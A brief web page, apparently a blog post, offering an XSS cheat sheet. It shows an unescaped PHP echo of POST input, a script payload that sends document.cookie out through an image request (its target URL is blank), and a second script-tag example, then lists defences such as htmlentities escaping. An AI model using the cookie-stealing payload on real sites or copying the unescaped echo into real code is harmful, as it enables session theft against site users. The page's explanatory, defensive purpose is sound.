Cross Site Scripting (XSS)


XSS Cheat Sheet:

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.


<?php echo $_POST[‘name’]; ?>

Examples of XSS exploits:


<script>new Image().src=’’+encodeURI(document.cookie)</script>

<script src=””></script>


– Validate the input

– Escape the input / output

<?php echo htmlentities($_POST[‘name’], ENT_QUOTES, ‘UTF-8’);?>

– Only allow the same IP to access the cookie

Leave a Reply

Your email address will not be published. Required fields are marked *